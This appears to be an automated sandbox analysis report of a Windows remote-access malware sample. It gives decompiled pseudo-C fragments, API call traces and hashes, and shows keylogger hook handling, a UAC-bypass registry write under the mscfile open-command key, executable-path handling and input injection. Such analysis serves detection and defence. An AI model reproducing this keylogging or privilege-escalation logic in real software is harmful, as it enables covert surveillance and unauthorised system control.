                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                  • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                  • Sleep.KERNEL32(00002710), ref: 00411B48
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                  • String ID: Alarm has been triggered!$[ALARM]
                                  • API String ID: 4004766653-1190268461
                                  • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                  • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                  • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0040D8FF() {
                                  				void* _t10;
                                  				char* _t12;
                                  				int _t13;
                                  				char* _t15;
                                  				signed int _t16;
                                  				char* _t18;
                                  				void* _t41;
                                  				void* _t46;
                                  				intOrPtr _t51;
                                  
                                  				_t51 =  *0x41bf20; // 0x0
                                  				 *0x41c119 = 0;
                                  				if(_t51 != 0) {
                                  					E004020F4(_t10, 0x41bf20);
                                  				}
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
                                  				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t13 = atoi(_t12);
                                  				E0040F572();
                                  				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t16 = atoi(_t15);
                                  				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
                                  				E004017DD(_t46 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                  • atoi.MSVCRT ref: 0040D947
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                  • atoi.MSVCRT ref: 0040D965
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                  • atoi.MSVCRT ref: 0040D981
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                  • String ID:
                                  • API String ID: 2234106156-0
                                  • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                  • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                  • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                  • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                  • API String ID: 1883807236-2313358711
                                  • Opcode ID: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                  • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                  • Opcode Fuzzy Hash: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                  • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 3885969548-3088914985
                                  • Opcode ID: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                  • Instruction ID: 60cde0a6a469a490c1b109ae90cccba4ec5744e34f2951ce39ed213dd0605107
                                  • Opcode Fuzzy Hash: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                  • Instruction Fuzzy Hash: 2001D233740314A7DB0097949C59FEB7368DF84351F2040B7BA56A61D1DFB858D187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 19%
                                  			E00405CCA(struct HHOOK__** __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t9;
                                  				struct HHOOK__* _t16;
                                  				struct HHOOK__** _t30;
                                  
                                  				_push(__ecx);
                                  				_t30 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                  					_t9 = 0;
                                  				} else {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                  					E00405DD3(__ecx);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
                                  					_t30[0xf] = 0;
                                  					_t6 =  &(_t30[0xd]); // 0x0
                                  					_t30[0xa] = 0;
                                  					CloseHandle( *_t6);
                                  					if(_t30[0xf] == 0) {
                                  						_t16 =  *_t30;
                                  						if(_t16 != 0) {
                                  							UnhookWindowsHookEx(_t16);
                                  							 *_t30 = 0;
                                  						}
                                  					}
                                  					_t9 = 1;
                                  				}
                                  				return _t9;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                  • String ID: Online Keylogger Stopped$[INFO]
                                  • API String ID: 2254939683-2146459034
                                  • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                  • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InputSend
                                  • String ID:
                                  • API String ID: 3431551938-0
                                  • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                  • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
                                  				char _v20;
                                  				char _v36;
                                  				void* _t18;
                                  				void* _t20;
                                  				intOrPtr _t39;
                                  
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t39 =  *__eax;
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t18 = _t39 - 0x9b;
                                  				if(_t18 == 0) {
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
                                  					 *0x41b288 = 1;
                                  					_t20 = E0040180C( &_v20, __eflags, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  					E004020C2(0x41b240, 0x9c, _t20);
                                  				} else {
                                  					if(_t18 == 0) {
                                  						E00401B26();
                                  					}
                                  				}
                                  				E004017DD( &_v20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00401A80
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
